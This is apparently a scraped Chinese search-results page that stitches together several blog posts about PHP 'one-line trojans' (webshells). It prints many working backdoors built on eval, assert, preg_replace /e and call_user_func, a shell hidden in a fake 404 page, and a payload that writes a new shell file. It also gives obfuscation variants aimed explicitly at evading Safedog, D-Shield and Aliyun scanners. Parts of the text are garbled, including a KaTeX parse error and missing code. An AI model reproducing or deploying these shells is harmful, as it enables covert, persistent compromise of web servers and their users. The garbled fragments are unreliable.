精华内容
下载资源
问答
  • php一句话木马

    2020-09-18 14:47:24
    php一句话木马 1.介绍 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 2.原理 <?php @eval($_...

    php一句话木马

    1.介绍

    一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

    2.原理
    <?php @eval($_POST['shell']);?>

    这是php的一句话后门中最普遍的一种。它的工作原理是:
    首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。
    实例:<?php @eval($_POST['shell']);?>
    可以将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();
    在这里插入图片描述也可以用蚁剑或菜刀等工具连接(我这里用的是蚁剑):在url地址框中输入http://127.0.0.1/webshell.php,在连接密码框中输入shell
    在这里插入图片描述然后就可以看到目标站点目录下的文件了
    在这里插入图片描述

    展开全文
  • PHP一句话木马

    2018-10-25 17:35:00
    PHP一句话木马: 1. eval(): <?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行 2. assert(): 用法和 eval()一样 3. preg_replace(): <?php @preg_replace("/abcd/e",$_POST['hacker'...

    PHP一句话木马:
        1. eval():    <?php @eval($_POST['hacker']); ?>    eval函数将接受的字符串当做代码执行

        2. assert(): 用法和 eval()一样

        3. preg_replace(): <?php @preg_replace("/abcd/e",$_POST['hacker'],"abcdefg"); ?>    preg_replace 函数一个参数是一个正则表达式,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行

        4. create_function(): <?php
                                    $newfun = create_function('$hacker', 'echo $hacker;');
                                    $newfun('woaini');
                            ?>
                            创建了一个匿名函数,并返回了一个独一无二的函数名

        5. call_user_func(): <?php @call_user_func(eval,$_POST['hacker']); ?>    函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数
           call_user_func_array(): 方法同上,只是第二个参数要是一个数组,作为第一个参数的参数


           还有一些文件操作函数,比如 file_put_contents函数: <?php $test='一句话木马'; file_get_contents("文件名", $test); ?>
                   此函数把一个字符串写入一个文件中



    怎么让一句话木马绕过 WAF:
        WAF通常会以关键字判断是否为一句话木马,所以要将一句话木马变形使用,从而绕过 waf:
            1. php变量函数:
                <?php
                    $a = "assert";
                    $a($_POST['hacker']);
                ?>

            2. php可变变量:
                <?php
                    $b = "assert";
                    $a = 'b';
                    $$a($_POST['hacker']);
                ?>

            3. str_replace函数:
                <?php
                    $a = str_replace("b", "", "absbsbebrbt");
                    $a($_POST['hacker']);
                ?>
                此函数用于将第三个参数中的第一个参数替换为第二个参数

            4. base64_decode 函数:
                <?php
                    $a = base64_decode("YXNzZXJ0");
                    $a($_POST['hacker']);
                ?>

            5. 使用"."连接字符串:
                <?php
                    $b = "a"."ss";
                    $c = "er"."t";
                    $a = $b.$c;
                    $a($_POST['hacker']);
                ?>

            6. pares_str函数:
                <?php
                    $str = "a=assert";
                    parse_str($str);/parse_str("a=assert");
                    $a($_POST['hacker']);
                ?>

    最后举个例子:
                <?php
                    function fun(){
                        return $_POST['hacker'];
                    }
                    @preg_replace("/test/e", fun(), "testtesttest");
                ?>


    转载:https://bbs.ichunqiu.com/thread-26365-1-1.html

    转载于:https://www.cnblogs.com/white-album2/p/9851468.html

    展开全文
  • PHP 一句话木马

    2019-07-10 15:13:00
     在测试某网站时,发现为阿里云服务器,上传的一句话均被kill掉,于是搞了个过web安全狗,D盾,云盾的一句话木马,在此分享出来。 正文  一句话源码: 1 <?php 2 class a{ 3 public function __...

    前言

      在测试某网站时,发现为阿里云服务器,上传的一句话均被kill掉,于是搞了个过web安全狗,D盾,云盾的一句话木马,在此分享出来。

    正文

      一句话源码:

     1 <?php
     2     class a{
     3         public function __construct(){
     4             $this->a = $_REQUEST['a'];
     5         }
     6         public function get(){
     7             $a = $this->a;
     8             return $a;
     9         }
    10     }
    11     $func = new a;
    12 #    call_user_func_array($func->get(),$_REQUEST['b']);
    13     $params = $_REQUEST['b'];
    14     function callback($a,$b){
    15         $a($b);
    16     }
    17     callback($func->get(),$params);

       WEB安全狗  V4.0:

      

      D盾:

      

      如果一句话中使用  call_user_func_array  做回调函数的话会产生级别2:

      

      阿里云盾:

      首先上传一个一句话木马原型:<?php eval($_POST['xxx'])?>

      

      可以看到被检测出,在上传过狗一句话:

      

      

      可以看到阿里云一句话使用蚁剑连接成功。

     

    最后

      其实一句话想过狗并没有想象中的那么难,总之就是将简单的事情复杂化,通过各种手段执行一句话原型即可。

     

    转载于:https://www.cnblogs.com/Spec/p/11164102.html

    展开全文
  • 特把经常用到的网页后门... php一句话木马 <?@include($_POST[“jb51”]);?> <?php eval($_POST[cmd])?> 您可能感兴趣的文章:一句话木马入侵EASYNEWS新闻管理系统JSP一句话木马代码asp.net jsc
  • PHP一句话木马大全

    2021-05-31 16:01:28
    由于PHP一句话木马可以说有很多,简单的、中等的、复杂的…,今天主要是分享一些比较强悍的一些PHP一句话木马大全; 一、利用404页面隐藏PHP小马 404 Not Found Not Found The requested URL was not found on ...

    由于PHP一句话木马可以说有很多,简单的、中等的、复杂的…,今天主要是分享一些比较强悍的一些PHP一句话木马大全;

    一、利用404页面隐藏PHP小马

    404 Not Found

    Not Found

    The requested URL was not found on this server.

    <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?> 利用方法:

    404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

    二、无特征隐藏PHP一句话

    <?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a'); 利用方法: 将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。 三、超级隐蔽的PHP后门 <?php $_GET[a]($_GET[b]);?>

    仅用GET函数就构成了木马;

    利用方法:

    ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
    执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

    四、层级请求,编码运行PHP后门
    此方法用两个文件实现,文件1:

    <?php //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); } 文件2: <?php //2.php ```php header('Content-type:text/html;charset=utf-8'); //要执行的代码 $code = <<
    
    在菜刀里写 http://site/1.php?2=assert 密码是1;
    
     
    
    第二个:
    
    ```php
    <?php
    $_="";
    $_[+""]='';
    $_="$_"."";
    $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
    ?>
    <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
    

    在菜刀里写 http://site/2.php?_=assert&__=eval($_POST[‘pass’]) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

    第三个:

    ($b4dboy = KaTeX parse error: Expected 'EOF', got '&' at position 18: …OST['b4dboy']) &̲& @preg_replace…b4dboy)’, ‘add’);
    str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

    七、6个高级的PHP一句话木马后门
    第一个:菜刀一句话

    <?php
    $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
    $hh("/[discuz]/e",$_POST['h'],"Access");
    

    第二个:危险的include函数,直接编译任何文件为php格式运行

    <?php
    $filename=$_GET['xbid'];
    include ($filename);
    

    第三个:重命名任何文件

    <?php
    $reg="c"."o"."p"."y";
    $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
    

    第四个:菜刀一句话

    <?php
    $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
    $gzid("/[discuz]/e",$_POST['h'],"Access");
    

    第五个:危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif;gif插一句话;

    <?php
    include ($uid);
    

    第六个:8个典型的PHP一句话木马(程序后门代码)

    1、

    <?php eval_r($_POST[sb])   ?>
    
    

    2、

    <?php @eval_r($_POST[sb])?>
    

    //容错代码
    3、

    <?php assert($_POST[sb]);?>
    

    //使用lanker一句话客户端的专家模式执行相关的php语句
    4、

    <?$_POST['sa']($_POST['sb']);?>
    

    5、

    <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
    

    6、

    <?php
    @preg_replace("/[email]/e",$_POST['h'],"error");
    ?>
    

    //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
    7、

    <O>h=@eval_r($_POST1);</O>
    

    8、

    <script language="php">@eval_r($_POST[sb])ss</script>
    

    //绕过<?限制的一句话

    展开全文
  • PHP一句话木马客户端

    热门讨论 2010-09-04 14:56:27
    PHP一句话木马客户端,便于连接PHP一句话木马,非常实用
  • PHP一句话木马集合

    2021-05-21 10:48:28
    whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
  • php一句话木马变形技巧

    万次阅读 热门讨论 2019-09-23 21:33:53
    一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、...
  • 天山童姥专用PHP一句话木马 天山童姥专用PHP一句话木马
  • php 一句话木马简介

    2020-07-01 19:32:24
    一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['...
  • php 一句话木马、后门

    万次阅读 2016-08-22 12:43:12
    这类后门让网站、服务器管理员很是头疼,经常要换着方法...今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: 404 Not Found Not Found The requested URL was not found on this server. php
  • PHP一句话木马使用技巧

    千次阅读 2020-01-20 12:43:21
    近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。 PHP一句话:<?php @eval($_POST['shy']);?> firefox浏览器:hackbar 命令提示符:curl 首先上传一句话木马...
  • PHP一句话木马及绕waf思路

    千次阅读 2020-03-23 13:05:22
    PHP一句话木马: 1 .eval(): <?php @eval($_POST['-7']); ?> eval函数将接受的字符串当做代码执行。 2.assert(): <?php @assert ($_POST['-7']); ?> assert函数将接受的字符串当做代码执行 。 3.preg...
  • PHP一句话木马后门

    千次阅读 2019-09-20 04:37:07
    在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。 一句话木马的原理很简单,造型也很简单...
  • 一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 二、编码的替换的类型: <?php @fputs(fopen(base...
  • 一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来: 1 <?php @eval($_GET["code"])?> 2 <?php @system($_POST["cmd"])?> 相信一目了然可以看懂如何使用这类一句话。 如果有...
  • eval函数简介与PHP一句话木马剖析

    千次阅读 2019-04-19 20:36:11
    eval函数简介与PHP一句话木马剖析 一、eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中...
  • 正确的php一句话木马 这是哲学上或道德上的命令。 很一般。 这就像“快速失败”。 我想到它的原因是我想使用Java 8编译和发布License3j,而JavaDoc在发行版本构建期间拒绝编译。 该软件包是一个简单的许可证管理...
  • 零魂PHP一句话木马客户端(一键提交版)
  • PHP一句话木马研究

    2019-01-26 08:49:00
    最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。 现总结如下: 方案一:回调函数 回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,250
精华内容 500
关键字:

php一句话木马